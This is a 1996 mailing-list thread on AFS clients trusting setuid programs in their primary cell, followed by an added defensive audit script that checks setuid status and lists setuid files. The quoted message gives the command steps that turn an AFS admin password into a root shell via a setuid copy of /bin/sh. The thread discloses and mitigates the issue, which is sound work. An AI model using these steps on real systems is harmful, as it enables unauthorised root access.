Whether clients trust SUID programs from AFS depends largely on the client.
By default, AFS clients trust the suid bit for any program located within
their primary cell.  This can be disabled. (See fs_setcell(1) man page.)

The philosophy is that all clients in the company should trust the cell's
AFS administrators.  If that is not true, then clients will have to change
the default (perhaps in the afs startup script).

    -- Garrett D'Amore.

On Thu, 10 Oct 1996 12:08:24 -0400  Tom Nguyen wrote:

> Hi all,
> 
> At Brookhaven National Lab, we just found something very interesting.
> That is, if you know the AFS admin password, you can become root on any
> AFS client machine in the cell (except Solaris machines). We did the following tests
> on AIX, SGI, HPUX and we succeeded. Solaris somehow is smart enough to stop the
> break-in.
> 
> login as a user on any AFS client machine belonging to your cell
> % klog admin
> % cd /afs/<your-cell>
> % cp /bin/sh .
> % chown root sh
> % chmod 4755 sh
> % ./sh
> % whoami
>   root
>   
> In other words, if I am the AFS administrator, I can be root on any AFS client machine
> belonging to my cell. Is it cool?
> 
> Tom Nguyen
> 

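As an added example, not taken from either message in this thread, the script below shows what a client administrator would actually run to check and close the hole Garrett describes: it parses the setuid status reported for a cell, emits the command that turns setuid trust off, and sweeps a directory for setuid/setgid files so the "cp /bin/sh; chmod 4755" trick can be spotted after the fact. It assumes the OpenAFS `fs getcellstatus` and `fs setcell -cell <name> -nosuid` commands and that `fs getcellstatus` prints "Cell <name> status: setuid allowed" or "Cell <name> status: no setuid allowed"; the cell name example.com and the sample status lines are placeholders constructed for illustration.

```shell
#!/bin/sh
# Added example for this thread; not code from either poster.
# Assumes OpenAFS "fs getcellstatus" / "fs setcell -nosuid" and the
# "Cell <name> status: [no ]setuid allowed" output format (an assumption).

# Return 0 if a "fs getcellstatus" output line says the client honours
# setuid bits for that cell, 1 if it does not, 2 if the line is unrecognised.
afs_setuid_allowed() {
    case "$1" in
        *"no setuid allowed"*) return 1 ;;
        *"setuid allowed"*)    return 0 ;;
        *) echo "unrecognised fs getcellstatus output: $1" >&2; return 2 ;;
    esac
}

# Print the command that stops this client from trusting setuid bits
# for the named cell (run as root; normally placed in the afs startup script).
afs_nosuid_cmd() {
    printf 'fs setcell -cell %s -nosuid\n' "$1"
}

# List setuid/setgid regular files below a path, e.g. /afs/<cell>.
# Works on any directory, so it can be tested without an AFS mount.
find_suid_files() {
    find "$1" -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null
}

# Audit one cell on this client: query its status and print the fix
# if setuid is still trusted. Returns 0 (safe), 1 (trusted), 2 (error).
audit_cell() {
    cell="$1"
    status="$(fs getcellstatus "$cell" 2>/dev/null)" || {
        echo "fs getcellstatus failed for $cell" >&2
        return 2
    }
    rc=0
    afs_setuid_allowed "$status" || rc=$?
    case $rc in
        0)
            echo "WARNING: $cell honours setuid bits; disable with:"
            afs_nosuid_cmd "$cell"
            echo "Setuid files currently served from /afs/$cell:"
            find_suid_files "/afs/$cell"
            return 1
            ;;
        1) echo "OK: $cell does not honour setuid bits"; return 0 ;;
        *) return 2 ;;
    esac
}

# Usage: sh afs_suid_audit.sh <cell-name>
if [ -n "${1:-}" ]; then
    audit_cell "$1"
fi
```

The sweep is only a detective control; the fix is the `-nosuid` setting, which has to be applied on every client (the cell administrator's tokens, not client root, are what the attack needs).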